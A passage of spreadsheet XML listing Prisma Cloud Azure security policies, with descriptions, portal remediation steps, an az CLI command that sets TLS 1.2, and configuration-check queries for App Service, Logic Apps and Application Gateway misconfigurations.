https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-6
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-6</t>
        </is>
      </c>
      <c r="Y2206" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/app_name/config/*' permission. Successful execution sets web app TLS encryption version to latest TLS version(i.e. TLS 1.2).",
'impact': 'Sets latest TLS version in Azure App Service',
'cliScriptTemplate': 'az webapp config set --resource-group $resourceGroup --name $resourceName --min-tls-version 1.2'</t>
        </is>
      </c>
      <c r="Z2206" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = kind starts with app and config.minTlsVersion is member of ('1.0', '1.1')
{"category":"Networking","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA2206" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2206" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2206" t="inlineStr">
        <is>
          <t>PC-AZR-APP-408-CKV_AZURE_15</t>
        </is>
      </c>
      <c r="AD2206" t="b">
        <v>1</v>
      </c>
      <c r="AE2206" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2206" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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06" t="inlineStr">
        <is>
          <t>74e43b65-16bf-42a5-8d10-a0f245716cde</t>
        </is>
      </c>
      <c r="AI2206" t="inlineStr">
        <is>
          <t>f56bc36e-d357-46e2-a9d6-f451f17076fe</t>
        </is>
      </c>
      <c r="AJ2206" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2206" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2207">
      <c r="A2207" t="inlineStr"/>
      <c r="B2207" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2207" s="2" t="inlineStr"/>
      <c r="D2207" t="inlineStr"/>
      <c r="E2207" t="inlineStr"/>
      <c r="F2207" t="inlineStr"/>
      <c r="G2207" t="b">
        <v>1</v>
      </c>
      <c r="H22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07" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2207" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2207" t="inlineStr">
        <is>
          <t>Server Side Request Forgery (SSRF) risk due to publicly exposed and vulnerable Azure Function [Node.js, CVE-2020-28168]</t>
        </is>
      </c>
      <c r="L2207" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2207" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2207" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2207" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2207" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2207" t="inlineStr"/>
      <c r="R2207" t="inlineStr"/>
      <c r="S2207" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2207" t="b">
        <v>0</v>
      </c>
      <c r="U2207" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2207" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2207" t="inlineStr">
        <is>
          <t>This policy identifies Azure Functions that are publicly exposed and have known exploitable server side request forgery vulnerability [Node.js, CVE-2020-28168].
Server side request forgery vulnerability is a security flaw that allows an attacker to force a server to make unintended requests. Exploiting this vulnerability compromises data confidentiality and can lead to unauthorized actions. The fact that the Azure Function is publicly exposed makes it an easy target for an attacker to exploit the affected system.
Immediate attention is required to remediate the Node.js [CVE-2020-28168] vulnerability and public exposure reported for the Azure Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2207" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the Azure portal
2. Navigate to Function App
3. Click on the reported Function App
4. Under Settings section, Click on 'Networking'
5. On the Networking page, under Inbound traffic configuration, select the Public network access setting.
6. On the Access Restrictions page, review and remove the list of access restriction rules that are defined overly permissive for your app.
7. To add an access restriction rule to your app, on the Access Restrictions page, select Add. The rule is only effective after saving.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2207" t="inlineStr"/>
      <c r="Z2207" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access') AND with : (Vuln WHERE id IN ('CVE-2020-28168'))</t>
        </is>
      </c>
      <c r="AA2207" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2207" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:54</t>
        </is>
      </c>
      <c r="AC2207" t="inlineStr"/>
      <c r="AD2207" t="b">
        <v>1</v>
      </c>
      <c r="AE2207" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2207" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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07" t="inlineStr">
        <is>
          <t>919b1c7d-b341-4023-9937-3c02a24d3c82</t>
        </is>
      </c>
      <c r="AI2207" t="inlineStr">
        <is>
          <t>5d5f1848-915a-4304-9b7c-b0e7bb63aa03</t>
        </is>
      </c>
      <c r="AJ2207" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2207" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2208">
      <c r="A2208" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, TX-RAMP Level 2, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2208" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2208" s="2" t="inlineStr"/>
      <c r="D2208" t="inlineStr"/>
      <c r="E2208" t="inlineStr"/>
      <c r="F2208" t="inlineStr"/>
      <c r="G2208" t="b">
        <v>1</v>
      </c>
      <c r="H22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208" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2208" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2208" t="inlineStr">
        <is>
          <t>Azure Logic app configured with public network access</t>
        </is>
      </c>
      <c r="L2208" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2208" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2208" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2208" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2208" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2208" t="inlineStr">
        <is>
          <t>LT</t>
        </is>
      </c>
      <c r="R2208" t="inlineStr">
        <is>
          <t>LT-4</t>
        </is>
      </c>
      <c r="S2208" t="inlineStr"/>
      <c r="T2208" t="b">
        <v>0</v>
      </c>
      <c r="U2208" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2208" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2208" t="inlineStr">
        <is>
          <t>This policy identifies Azure Logic apps that are configured with public network access.
Exposing Logic Apps directly to the public internet increases the attack surface, making them more susceptible to unauthorized access, security threats, and potential breaches. By limiting Logic Apps to private network access, they are securely managed and less prone to external vulnerabilities.
As a security best practice, it is recommended to configure private network access or restrict the public exposure only to the required entities instead of wide ranges.</t>
        </is>
      </c>
      <c r="X2208" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to Logic apps
3. Click on the reported Logic app
4. Under 'Setting' section, click on 'Networking'
5. On the 'Networking' page, under 'Inbound traffic configuration' section, select the 'Public network access' setting.
6. On the 'Access Restrictions' page, review the list of access restriction rules that are defined for your app and avoid providing access to all networks.
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2208" t="inlineStr"/>
      <c r="Z2208" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'properties.state equal ignore case running and kind contains workflowapp and ((properties.publicNetworkAccess exists and properties.publicNetworkAccess equal ignore case Enabled) or (properties.publicNetworkAccess does not exist and (properties.privateLinkIdentifiers does not exist or properties.privateLinkIdentifiers is empty))) and config.ipSecurityRestrictions[?any((action equals Allow and ipAddress equals Any) or (action equals Allow and ipAddress equals 0.0.0.0/0))] exists'</t>
        </is>
      </c>
      <c r="AA2208" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2208" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2208" t="inlineStr">
        <is>
          <t>PC-AZR-APP-1213</t>
        </is>
      </c>
      <c r="AD2208" t="b">
        <v>1</v>
      </c>
      <c r="AE2208" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2208" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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8" t="inlineStr">
        <is>
          <t>62355d0c-32be-4235-a400-1326b0d6a83d</t>
        </is>
      </c>
      <c r="AI2208" t="inlineStr">
        <is>
          <t>e7ad2ee1-050a-458d-bf04-0569fec3d855</t>
        </is>
      </c>
      <c r="AJ2208" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2208" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2209">
      <c r="A2209" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, TX-RAMP Level 2, CIS Controls v8.1, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2209" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2209" s="2" t="inlineStr"/>
      <c r="D2209" t="inlineStr"/>
      <c r="E2209" t="inlineStr"/>
      <c r="F2209" t="inlineStr"/>
      <c r="G2209" t="b">
        <v>1</v>
      </c>
      <c r="H22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209" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2209" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2209" t="inlineStr">
        <is>
          <t>Azure Logic App does not utilize HTTP 2.0 version</t>
        </is>
      </c>
      <c r="L2209" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2209" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2209" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2209" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2209" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2209" t="inlineStr">
        <is>
          <t>Vulnerability &amp; Patch Management</t>
        </is>
      </c>
      <c r="R2209" t="inlineStr">
        <is>
          <t>VPM-05.4:Automated Software &amp; Firmware Updates</t>
        </is>
      </c>
      <c r="S2209" t="inlineStr"/>
      <c r="T2209" t="b">
        <v>0</v>
      </c>
      <c r="U2209" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2209" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2209" t="inlineStr">
        <is>
          <t>This policy identifies Azure Logic apps that are not utilizing HTTP 2.0 version.
Azure Logic app using HTTP 1.0 for its connection is considered not secure as HTTP 2.0 version has additional performance improvements on the head-of-line blocking problem of old HTTP version, header compression, and prioritisation of requests. HTTP 2.0 no longer supports HTTP 1.1's chunked transfer encoding mechanism, as it provides its own, more efficient, mechanisms for data streaming.
As a security best practice,  it is recommended to configure HTTP 2.0 version for Logic apps connections.</t>
        </is>
      </c>
      <c r="X2209" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to Logic apps
3. Click on the reported Logic app
4. Under 'Setting' section, click on 'Configuration'
5. Under 'General settings' tab, Set 'HTTP version' to '2.0'
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2209" t="inlineStr"/>
      <c r="Z2209" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case Running and kind contains workflowapp and config.http20Enabled is false</t>
        </is>
      </c>
      <c r="AA2209" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2209" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2209" t="inlineStr">
        <is>
          <t>PC-AZR-APP-1219</t>
        </is>
      </c>
      <c r="AD2209" t="b">
        <v>1</v>
      </c>
      <c r="AE2209" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2209" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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09" t="inlineStr">
        <is>
          <t>6d2114ab-1ff9-4d73-9385-d3cb6291b0af</t>
        </is>
      </c>
      <c r="AI2209" t="inlineStr">
        <is>
          <t>6cd29a62-215e-44f4-8fbd-d19a1c51a431</t>
        </is>
      </c>
      <c r="AJ2209" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2209" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2210">
      <c r="A2210" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, Microsoft Cloud Security Benchmark v1, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2210" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2210" s="2" t="inlineStr"/>
      <c r="D2210" t="inlineStr"/>
      <c r="E2210" t="inlineStr"/>
      <c r="F2210" t="inlineStr"/>
      <c r="G2210" t="b">
        <v>1</v>
      </c>
      <c r="H22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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2210" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2210" t="inlineStr">
        <is>
          <t>Azure App Service Environment configured with weak TLS cipher suites</t>
        </is>
      </c>
      <c r="L2210" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2210" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2210" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2210" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2210" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2210" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2210" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S2210" t="inlineStr"/>
      <c r="T2210" t="b">
        <v>0</v>
      </c>
      <c r="U2210" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2210" t="inlineStr">
        <is>
          <t>azure-app-service-environment</t>
        </is>
      </c>
      <c r="W2210" t="inlineStr">
        <is>
          <t>This policy identifies Azure App Service Environments that are configured with weak TLS Cipher suites.
Azure App Service Environments host web applications and APIs in a dedicated and isolated environment. When these environments are configured with weak TLS Cipher suites, they can expose sensitive data to potential security risks. Weak cipher suites may allow attackers to intercept and decrypt communication between clients and the App Service Environment, leading to unauthorized access, data breaches, and potential compliance violations. The recommended cipher suites are TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 and TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256.
As best practice, it is recommended to avoid using weak TLS Cipher suites to enhance security and protect sensitive data.</t>
        </is>
      </c>
      <c r="X2210" t="inlineStr">
        <is>
          <t>Refer to the documentation:
https://learn.microsoft.com/en-us/azure/app-service/environment/app-service-app-service-environment-custom-settings</t>
        </is>
      </c>
      <c r="Y2210" t="inlineStr"/>
      <c r="Z2210" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service-environment' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.clusterSettings exists and properties.clusterSettings[?any(name equal ignore case FrontEndSSLCipherSuiteOrder)] does not exist</t>
        </is>
      </c>
      <c r="AA2210" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2210" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2210" t="inlineStr">
        <is>
          <t>PC-AZR-APP-1172</t>
        </is>
      </c>
      <c r="AD2210" t="b">
        <v>1</v>
      </c>
      <c r="AE2210" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2210" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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0" t="inlineStr">
        <is>
          <t>01684931-0ea8-4e1b-bdd2-8927bc278f5f</t>
        </is>
      </c>
      <c r="AI2210" t="inlineStr">
        <is>
          <t>34b6032c-d707-4064-9f60-948e82d27d19</t>
        </is>
      </c>
      <c r="AJ2210" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2210" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2211">
      <c r="A2211" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, NYDFS 23 CRR-NY 500.0, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, ISO/IEC 27002:2013, Telecommunications Security Act - TSA, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, NIST 800-53 Rev 5, CSA CCM v.4.0.6, ISO 27002:2022, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, DORA, ISO/IEC 27002:2013, TX-RAMP Level 2, CSA CCM v4.0.12, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, FFIEC, ISO/IEC 27018:2019, Copy of CIS Controls v8, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, CSA CCM v.4.0.6, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02</t>
        </is>
      </c>
      <c r="B2211" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2211" s="2" t="inlineStr"/>
      <c r="D2211" t="inlineStr"/>
      <c r="E2211" t="inlineStr"/>
      <c r="F2211" t="inlineStr"/>
      <c r="G2211" t="b">
        <v>1</v>
      </c>
      <c r="H22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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2211" t="inlineStr">
        <is>
          <t>azure-application-gateway</t>
        </is>
      </c>
      <c r="K2211" t="inlineStr">
        <is>
          <t>Azure Application gateways listener that allow connection requests over HTTP</t>
        </is>
      </c>
      <c r="L2211" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2211" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2211" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2211" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2211" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2211" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2211" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2211" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2211" t="b">
        <v>0</v>
      </c>
      <c r="U2211" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2211" t="inlineStr">
        <is>
          <t>azure-application-gateway</t>
        </is>
      </c>
      <c r="W2211" t="inlineStr">
        <is>
          <t>This policy identifies Azure Application gateways that are configured to accept connection requests over HTTP. As a best practice, use the HTTPS protocol to encrypt the communication between the application clients and the application gateways.</t>
        </is>
      </c>
      <c r="X2211" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Select 'All services'
3. Select 'Application gateways', under NETWORKING
4. Select the Application gateways needed to be modified
5. Select 'Listeners' under Settings
6. To add HTTPS listener follow below step, if already HTTPS listener present jump to point 10
7. Click on 'Add listener', enter 'Listener name', 'Frontend IP'
8. Select 'Protocol' as HTTPS and fill in 'Https Settings' and 'Additional settings' and click on 'Add'
9. Click on 'Rules' in the left pane and click on 'Request routing rule' and associate HTTPS listener to a rule 
10. Click on three dots on the right corner of a row containing 'Protocol' as HTTP
11. Click on 'Delete' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-217
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-217</t>
        </is>
      </c>
      <c r="Y2211" t="inlineStr"/>
      <c r="Z2211" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-application-gateway' AND json.rule = ['properties.httpListeners'][*].['properties.protocol'] equals Http
{"category":"General","resourceTypes":["azurerm_application_gateway"]}</t>
        </is>
      </c>
      <c r="AA2211" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2211" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2211" t="inlineStr">
        <is>
          <t>PC-AZR-AGW-555-CKV_AZURE_217</t>
        </is>
      </c>
      <c r="AD2211" t="b">
        <v>1</v>
      </c>
      <c r="AE2211" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2211" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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1" t="inlineStr">
        <is>
          <t>f552fc4a-b210-4ec1-adfe-c29350a04f92</t>
        </is>
      </c>
      <c r="AI2211" t="inlineStr">
        <is>
          <t>864d0191-9e8f-46d0-9b3d-f76680579ff6</t>
        </is>
      </c>
      <c r="AJ2211" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2211" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2212">
      <c r="A2212" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST SP 800-172, New Zealand Information Security Manual (NZISM v3.4), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, MITRE ATT&amp;CK v8.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, CIS Controls v8.1, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CIS Controls v7.1, MITRE ATT&amp;CK v12, CRI Profile v1.2.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, NIST 800-53 Rev 5, ISO 27002:2022, ACSC Information Security Manual (ISM), SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, Matt's ATT&amp;ACK, TX-RAMP Level 1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, PCI DSS v4.0, DORA, NIST CSF v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, Microsoft Cloud Security Benchmark v1, ISO/IEC 27018:2019, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, ITSG-33, Copy of New Zealand Information Security Manual (NZISM v3.4), CRI Profile v1.2.1, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, GDPR, kfirdaus AWS Account-CS, PCI DSS v3.2.1, CRI Profile v2.0, SOC 2, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, CIS Controls v8, CIS Controls v8.1, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2212" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2212" s="2" t="inlineStr"/>
      <c r="D2212" t="inlineStr"/>
      <c r="E2212" t="inlineStr"/>
      <c r="F2212" t="inlineStr"/>
      <c r="G2212" t="b">
        <v>1</v>
      </c>
      <c r="H22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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2212" t="inlineStr">
        <is>
          <t>azure-application-gateway</t>
        </is>
      </c>
      <c r="K2212" t="inlineStr">
        <is>
          <t>Azure Application Gateway is configured with SSL policy having TLS version 1.1 or lower</t>
        </is>
      </c>
      <c r="L2212" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2212" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2212" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
